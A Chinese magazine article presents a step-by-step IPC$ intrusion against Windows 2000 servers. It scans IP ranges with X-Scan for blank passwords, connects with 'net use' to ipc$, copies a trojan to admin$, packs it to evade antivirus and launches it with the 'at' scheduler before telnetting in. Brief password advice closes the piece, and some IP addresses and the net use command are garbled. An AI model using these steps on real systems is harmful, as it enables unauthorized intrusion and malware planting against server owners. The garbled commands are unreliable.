在第13期我们谈了局域网中入侵服务器的方式以及防范对策,这次笔者想根据自己的经验谈谈互联网对本地服务器的入侵。常见的互联网入侵无非有以下几种:1.IPC入侵;2.利用系统的安全漏洞溢出管理员进行入侵;3.DDoS攻击,也叫分布式拒绝服务。 如果你的系统遇到了三种情况之一,而且被扫描软件扫描到,那就很危险了。为了便于大家更好地理解,笔者就在模拟环境中举例讲解,请大家一定不要按照此方法入侵别人的服务器。
几种入侵方式
首先请安装Win2000系统,然后打开扫描软件X-Scan2.3,再点击“设置/扫描参数”,在出现的对话框中添入一段IP地址,如61.139..1—61.139.2.255,然后点击确定。继续点击“设置→扫描模块”,勾选SQL-Server弱口令、NT-Server弱口令,点击确定,再点击“开始扫描”。一会儿后,X-Scan就已经扫描完了,看看结果,有几十台电脑符合我们的要求。任意点击一IP地址如61.139..100,打开追捕,查看了一下该IP的具体位置以及用户名,做到心中有数,并查看一下该IP所开的端口以及所提供的服务,相关的步骤都可用X-Scan实现。收集完所有需要的信息后,就可以开始入侵了。
打开一个cmd窗口,输入net use \\61.139.(.100\ipc$ '密码' /user)'用户名',回车,如果出现命令成功完成,那我们的电脑就和对方建立了IPC连接,再次在cmd中输入copy c\hack\wollf.exe \\61.139..100\admin$,回车,这时我们就将木马程序Wollf.exe拷贝到了对方的系统目录下,不过最好先加一下壳(这样不容易被病毒防火墙查杀)。下一步就是启动这个黑客程序WinNT上面有Schedule(定时服务,可利用它来启动这个程序。首先看一下对方此时的时间以便决定何时启动。输入命令net time \\61.139..100,查看到对方的本地时间为23∶11,那我们就用at命令来启动它。输入at \\61.139..100 23∶13 Wollf.exe等待几分钟,我们就可以Telnet上去了。
这一次的黑客入侵发现,管理员安全意识过于薄弱,密码竟然为空。而在我国的电脑上空口令非常多见,请现在还在使用空口令的用户赶快加上密码,密码最好在8位以上,采用大小写字母加字符的组合。不要以为采用了密码就安全无忧了,请记住在理论上没有攻克不了的密码,所以一定还要定期更改密码。还有一点,SQL Server安装后将产生默认的SA用户,密码为空,黑客可以利用SQL Server客户端来进行数据库远程连接。如果被扫描到,那你的系统也就完了,它所开放的端口为1433。
